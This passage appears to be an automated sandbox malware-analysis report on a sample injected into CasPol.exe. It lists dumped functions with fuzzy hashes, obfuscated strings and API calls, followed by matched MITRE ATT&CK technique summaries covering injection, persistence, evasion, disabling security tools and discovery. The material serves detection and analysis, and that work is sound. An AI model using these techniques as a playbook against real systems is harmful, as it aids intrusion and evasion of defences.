Instruction ID: 95102021236ab8344cfbfa0c6a56fc49a4706481ae33b184826372a40b2b6d82
Opcode Fuzzy Hash: 19b6fe026cb026af95f395aa65d55b514a374dc3c1b689d9836d6df7188b7864
Instruction Fuzzy Hash: 48C08C322842488F8E012FB1584A219BA8CAA40214BC00076A40BC2002EF3C84044A41

Function 23BDE35B Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22690482579e76392c4034c3373a719bd5f91a11525108648164d98cd89dfe5d
Instruction ID: 78c77589ea9cdbfb55c0a0a932be50b6911fb0a5d7811d3238968924bc19c8af
Opcode Fuzzy Hash: 22690482579e76392c4034c3373a719bd5f91a11525108648164d98cd89dfe5d
Instruction Fuzzy Hash: 17C04C77A4414A8BEB009B95E4453ECB764E780329F1440A6E21952541867502554B91

Function 23BD0660 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0de231380ff90cb0b02527447cfefbd04a2a6ec47f32563fce2055451323d4a2
Instruction ID: 13ea93f08ad3b27209e0c0558917cd1954cb1bb38bd228899293134518d40697
Opcode Fuzzy Hash: 0de231380ff90cb0b02527447cfefbd04a2a6ec47f32563fce2055451323d4a2
Instruction Fuzzy Hash: 50C02B330C524CCA82049EB00805C153308A6C0305B4084F9900100010CB3258528923

Function 23BD2EC0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 910d6a9fb9f5bc80fed30e9d40b621bba47fc52d9522225803f6f1dd9147b1ba
Instruction ID: 502302d7877cf8368459ba971e34c11c98878b10e2251d4022af82c7c635d95b
Opcode Fuzzy Hash: 910d6a9fb9f5bc80fed30e9d40b621bba47fc52d9522225803f6f1dd9147b1ba
Instruction Fuzzy Hash: C4B0123265464C0B5740AEB11808602328C954040534000749C0DC5001F519D0904644

Function 23BDE620 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98d32be50dd634b8f9ee25c74b23562728bc8f930d0c92791a6c0e0453ed1be1
Instruction ID: 66998bd3785455eebdd967f3f6ff7ec159682994971030ffe97e655424421408
Opcode Fuzzy Hash: 98d32be50dd634b8f9ee25c74b23562728bc8f930d0c92791a6c0e0453ed1be1
Instruction Fuzzy Hash: B0B012661C1B0C07895037F8108907D33DC0E56028BC000F9554E426809F2954404591

Function 23BDCE70 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcac760612507ea1da3931f558968ca914e685ec80323f6ff81d754cf581df80
Instruction ID: 302be64765880d9fb06648a7fff644bd21c3c3a36a22e566a032aad86114ada9
Opcode Fuzzy Hash: dcac760612507ea1da3931f558968ca914e685ec80323f6ff81d754cf581df80
Instruction Fuzzy Hash: 24B092B208838D978109EA21C88ACD9B629EE0A642BD00575F8020509DDBB869044ADA

Function 23BD6D54 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9331830965d72d12fcbefa973c87c0cf332396a92bd300e1243d284f656f33ac
Instruction ID: 0f9fb5dc4bd4ea912bab9168bcfafa9e89a552c33551db60ed0cb65eb0c0f0fc
Opcode Fuzzy Hash: 9331830965d72d12fcbefa973c87c0cf332396a92bd300e1243d284f656f33ac
Instruction Fuzzy Hash: CDB092B7A04049C9DB00CA84B4417DDF720E790229F104073C31066004C23211648691

Function 23BDE090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05d980f4d475ded044f0b3b06273548e9e91038fce78f98e394fc32e8a685903
Instruction ID: 58330e0c717245f8afe76dae2c9b67a55fdf0170ed4df7d33438d458a5744030
Opcode Fuzzy Hash: 05d980f4d475ded044f0b3b06273548e9e91038fce78f98e394fc32e8a685903
Instruction Fuzzy Hash: FAA0023F64829DD7CB64EF20E593C5A33226F9D6407E18AF0860411528853A5805C951

Analysis Process: CasPol.exePID: 6188, Parent PID: 1480COMMON

Execution Graph

Execution Coverage:	7.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	21
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 011904B0 Relevance: 20.1, Strings: 14, Instructions: 2634
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

EZ=g^, xrefs: 011919B2, 011919B7, 01191A30, 01191A35
Z=g^, xrefs: 01190E93, 01190E98, 01190F02, 01190F07
eY=g^, xrefs: 01192967, 0119296C, 011929E5, 011929EA
%[=g^, xrefs: 01190A8F, 01190A94, 01190AFE, 01190B03
eZ=g^, xrefs: 01191774, 01191779, 011917F2, 011917F7
uZ=g^, xrefs: 01191655, 0119165A, 011916D3, 011916D8
uY=g^, xrefs: 011927A7, 011927AC, 011928C6, 011928CB
%Z=g^, xrefs: 01191BF0, 01191BF5, 01191C6F, 01191C74
Y=g^, xrefs: 0119206F, 01192074, 011920ED, 011920F2
UZ=g^, xrefs: 01191893, 01191898, 01191911, 01191916
UY=g^, xrefs: 01192A86, 01192A8B, 01192B04, 01192B09
EY=g^, xrefs: 01192BA5, 01192BAA, 01192C23, 01192C28, 01192CC4, 01192CC9, 01192D65, 01192D6A
5[=g^, xrefs: 01190991, 01190996, 011909FD, 01190A02
5Z=g^, xrefs: 01191AD1, 01191AD6, 01191B4F, 01191B54

Memory Dump Source

Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd

Similarity

API ID:
String ID: %Z=g^$%[=g^$5Z=g^$5[=g^$EY=g^$EZ=g^$UY=g^$UZ=g^$eY=g^$eZ=g^$uY=g^$uZ=g^$Y=g^$Z=g^
API String ID: 0-1539986449
Opcode ID: 12dff03d15a98676578f5691c5cdf2e10f4c91cbd1ed375c927c05bede724e84
Instruction ID: bdb914e09d611ffaf8027dcbe4ae25360c86da070ec57d26cad9e899a8da5788
Opcode Fuzzy Hash: 12dff03d15a98676578f5691c5cdf2e10f4c91cbd1ed375c927c05bede724e84
Instruction Fuzzy Hash: 3243B5746002598FC708DF25D844A69B7F2FF88308F5086ADE5099B39ACB71ED86DF91

Function 00EFA4AA Relevance: 1.6, APIs: 1, Instructions: 79
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E24,867C0970,00000000,00000000,00000000,00000000), ref: 00EFA53D

Memory Dump Source

Source File: 00000008.00000002.24004578066.0000000000EFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_efa000_CasPol.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 345e14358bb958d3e9b050d4dd86bef0504ca4a7cb68311d942e2c6fe186d8fe
Instruction ID: 75a28e4f0f7259718c286df896330009e492955099e921b6d4fc0887497bee8f
Opcode Fuzzy Hash: 345e14358bb958d3e9b050d4dd86bef0504ca4a7cb68311d942e2c6fe186d8fe
Instruction Fuzzy Hash: 2521B5754093C4AFD7228B61DC44FA6BFB8EF06314F0884DBE9849F1A3D265A518C7B6

Function 01192F60 Relevance: 1.6, Strings: 1, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@~g, xrefs: 01192FE0

Memory Dump Source

Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd

Similarity

API ID:
String ID: :@~g
API String ID: 0-2887969434
Opcode ID: 691cf95b29bde8af96aea22d943434a12a11103d455d1891363fed37756e8731
Instruction ID: 79440dbb65e52ae14a78f9019a9e4964e5474ee0676282c462d8a6e6586d0509
Opcode Fuzzy Hash: 691cf95b29bde8af96aea22d943434a12a11103d455d1891363fed37756e8731
Instruction Fuzzy Hash: 8FD18F34600215DFCF09EB78D598A2DB7F6BF48308F16C4A9E5269B262DB30ED41CB52

Function 00EFA1F4 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleOutputCP.KERNELBASE ref: 00EFA269

Memory Dump Source

Source File: 00000008.00000002.24004578066.0000000000EFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_efa000_CasPol.jbxd

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 87c63b37f492f8b2bdc80911f9ad98595a9311389d91cbcd21c7ae726e151974
Instruction ID: 455468d861f01b9ae180f37bf4aeedcfe6bc0f177a54f3b999fee7bb6eba9a8e
Opcode Fuzzy Hash: 87c63b37f492f8b2bdc80911f9ad98595a9311389d91cbcd21c7ae726e151974
Instruction Fuzzy Hash: 0821AC7540D7C09FD7138B658C94692BFB4EF03220F0E80DBD9848F1A3D269AD09CBA2

Function 00EFA4DE Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E24,867C0970,00000000,00000000,00000000,00000000), ref: 00EFA53D

Memory Dump Source

Source File: 00000008.00000002.24004578066.0000000000EFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_efa000_CasPol.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 0e434dde383e5b34a069e1f26e71bf82fe94cf30576bb451668c4639dba1d102
Instruction ID: 7a4e7c018a66c78829a36e6c7ca688f0e506291afbff843435005f739c1c63e3
Opcode Fuzzy Hash: 0e434dde383e5b34a069e1f26e71bf82fe94cf30576bb451668c4639dba1d102
Instruction Fuzzy Hash: 8411E275400204AFEB21DF51DC44FBAFBA8EF04324F08846AEA499E251C375A444CBB6

Function 00EFA23A Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleOutputCP.KERNELBASE ref: 00EFA269

Memory Dump Source

Source File: 00000008.00000002.24004578066.0000000000EFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_efa000_CasPol.jbxd

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 80be9254b855bf0af705cd0d0ecf39e7b152211ba12ecb142837f58d87b80089
Instruction ID: 735227892222193c7ab5ef2fffeb233b882d29030b7bae37e951a5b8b75b0b42
Opcode Fuzzy Hash: 80be9254b855bf0af705cd0d0ecf39e7b152211ba12ecb142837f58d87b80089
Instruction Fuzzy Hash: 44F0AF749042488FEB208F05D888771FBD0EF04725F48C0AADE095F362D37AA944CAA2

Function 01192E28 Relevance: .1, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f924a4de0ace45bfb36343c578f672839d5ae84eaeba9d702fe1d56a5eee48e2
Instruction ID: 3ac6911482c6588192cafece96c133daf93d664737b3815cf58eb11e483ef6f5
Opcode Fuzzy Hash: f924a4de0ace45bfb36343c578f672839d5ae84eaeba9d702fe1d56a5eee48e2
Instruction Fuzzy Hash: 8B416535B042258FCF09EFB8D8505AEBBF5EF89314F0580AAE955DB252DB348D41CB92

Function 011902A9 Relevance: .1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2672e506a8600988164ce1c4f2e3b626a6c3b1b19172844dafd0efd5f1f18b50
Instruction ID: 29bfb787b59fdb1a11b602ce283559fae1c0f0090d7ef4cb1785a1bd9e37fb23
Opcode Fuzzy Hash: 2672e506a8600988164ce1c4f2e3b626a6c3b1b19172844dafd0efd5f1f18b50
Instruction Fuzzy Hash: A0212E34B052048FDB19AB79D114A6D37E69FDD308B2445BCE216DB7A1DF35CC418B52

Function 011904A0 Relevance: .1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e8df5d9cdc6a2c58954f775800ea16432887901aefefa00c2729cb512eb6648
Instruction ID: ae38c68ebbad6b8e4147e4fba96d19dd556c95bc3717c70d8b8b60c921bceb42
Opcode Fuzzy Hash: 0e8df5d9cdc6a2c58954f775800ea16432887901aefefa00c2729cb512eb6648
Instruction Fuzzy Hash: 3221F430601214CFDB199B78E4487197BE5AF8E318F1589BAD919DF366DB31CC86CB82

Function 011903F8 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ddaafbc64c6530a670b4eb711ed471b08aaa4fba181119fe6b872deb0ae80be
Instruction ID: d4fb7bb965701767ff31062ed8edc4c7f0786b163b1f7cba7537caf71b331dfe
Opcode Fuzzy Hash: 6ddaafbc64c6530a670b4eb711ed471b08aaa4fba181119fe6b872deb0ae80be
Instruction Fuzzy Hash: 631102353051908FC309EB39F454E2E7BE2AB8D208724466DEA06CB396CB20CC86C793

Function 01190221 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f724d2eab4f277bb9b390b02be23abed73be8f9eeadca5da44e906a618d2be
Instruction ID: ecb81c4e4812847c25a96f5fff924e70514e56fa5612a98dc126a04330a20067
Opcode Fuzzy Hash: 31f724d2eab4f277bb9b390b02be23abed73be8f9eeadca5da44e906a618d2be
Instruction Fuzzy Hash: 5901A7719011189FCB58DFB5EC496AFBFB9FB48311B10866EE41AD3250DB318A45CB50

Function 010F05DF Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.24005018479.00000000010F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b3badbac4d8f2d2e667ea0b7e31e02f5b3b933520fb7266ad422b2831e119e4
Instruction ID: 8f909e376b5326e754a1201d165fd20fd3991b7df37d5490efb0119eb577247c
Opcode Fuzzy Hash: 1b3badbac4d8f2d2e667ea0b7e31e02f5b3b933520fb7266ad422b2831e119e4
Instruction Fuzzy Hash: A701DB755093445FD701CF159C44862FFF8EF8522070980AFFC498B612D235B804CB75

Function 01190230 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62a8c08a002f1aa4ddd953172d79acc7fdb29feaee5f6428d1a0f22f24883649
Instruction ID: 8c166393874bc70c5bb0ca5a3c00d8cbb260e3fa5b9b88ebfeaf8629bc768a12
Opcode Fuzzy Hash: 62a8c08a002f1aa4ddd953172d79acc7fdb29feaee5f6428d1a0f22f24883649
Instruction Fuzzy Hash: D5016271A012189FCF58EFB9EC4856EBBBDFB48311B108569E516D3290DB348A41CB91

Function 010F0606 Relevance: .0, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.24005018479.00000000010F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 010F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10f0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 819f20cf312094f06ad98701b9005cdc1374ddfbfbb93c2edca5970f2fef3273
Instruction ID: 5f8289ced11546566a9a72b0853fa6214c4e6e0d6d0af37417498ee490e7b2aa
Opcode Fuzzy Hash: 819f20cf312094f06ad98701b9005cdc1374ddfbfbb93c2edca5970f2fef3273
Instruction Fuzzy Hash: DFE092BA6006048B9650CF0AEC41462F7D8EB84730B08C07FDC0D8B711D236B505CAE5

Function 00EF23F4 Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.24004532298.0000000000EF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ef2000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f6b99894447693081c3957ad75ae48ed1808f8db7bcf217beeb19127edac327
Instruction ID: f62b1816a79a5dad61c6f04a57e58339e4fab93847537d4730110aaf09714ddc
Opcode Fuzzy Hash: 6f6b99894447693081c3957ad75ae48ed1808f8db7bcf217beeb19127edac327
Instruction Fuzzy Hash: 7BD05E792096814FD3179A1CC1A4BA537D4AB51B18F4A44FEA9408B763C7A8D981E610

Function 00EF23BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.24004532298.0000000000EF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ef2000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51e77bd3265b01c9b47fdb38e3f6a110b83a04ed83acb031fe17b4c39caaf5ae
Instruction ID: 4e5eb0755bd6c8ee5d944da2b62eeede088ee9b080b162e7df88c91101102912
Opcode Fuzzy Hash: 51e77bd3265b01c9b47fdb38e3f6a110b83a04ed83acb031fe17b4c39caaf5ae
Instruction Fuzzy Hash: 79D05E742016864BC719EE0CC6E4F6933D4AB50B18F0644EDAD508B662C7A8D8C0CA00

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
